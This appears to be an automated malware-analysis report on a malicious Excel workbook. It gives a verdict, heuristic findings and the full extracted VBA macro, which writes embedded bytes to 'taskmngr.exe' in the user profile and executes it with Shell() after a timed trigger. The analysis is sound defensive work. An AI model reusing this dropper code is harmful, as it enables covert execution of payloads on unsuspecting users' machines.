Verdict: MALICIOUS
Risk Score: 196
Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is an Office document containing a Workbook_Open macro that is designed to execute automatically. The macro attempts to write a payload from custom properties into a file named 'taskmngr.exe' in the user's profile directory and then execute it using the Shell() function. The presence of a Workbook_Open macro and the use of Shell() strongly indicate a macro-based downloader.
Heuristics (7)

| Finding | Severity | Rule | Description |
|---|---|---|---|
| VBA project inside OOXML (4 related findings) | medium | OOXML_VBA | Document contains a VBA project; VBA macros present |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
| Macro/content-enable lure | medium | SE_ENABLE_LURE | Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings |
| Hidden worksheet (veryHidden) | low | OOXML_HIDDEN_SHEET | Excel workbook contains 1 hidden sheet(s); hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction |
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1837 bytes | 96ab0391f90cf5ce48a70d407917e1e34aa3e69d3f9138317ded6826d4100479 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 12800 bytes | c12193f586fc4d8566354c8cb92fc93dfa5f339b40f91c724303080d1e485f94 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open2()
Dim sFileText As String
Dim allFIleText As String
iFileNo = FreeFile
allFIleText = ""
sFileText = ""
For Each ws In ThisWorkbook.Worksheets
If ws.Name <> "Start" Then
ws.Visible = xlSheetVisible
End If
Next ws
Sheets("Start").Visible = xlVeryHidden
Set cp = Sheet1.CustomProperties
allFIleText = Sheet1.CustomProperties.Item(1).Value
Dim TestArray() As String
TestArray = Split(allFIleText, "|")
Dim i As Long
Dim filename As String
filename = Environ("USERPROFILE") & "\taskmngr.exe"
If Not Dir(filename) <> "" Then
Open filename For Binary Lock Read Write As #2
For i = 0 To 8191
Put #2, , CByte(TestArray(i))
Next
Close #2
End If
Dim RetVal As Long
RetVal = Shell(filename, 1)
End Sub
Sub ScheduleAfter()
Dim Workbook_Open As Date
timeout = Now() + TimeValue("00:00:10")
Application.OnTime timeout, "Workbook_Open2"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```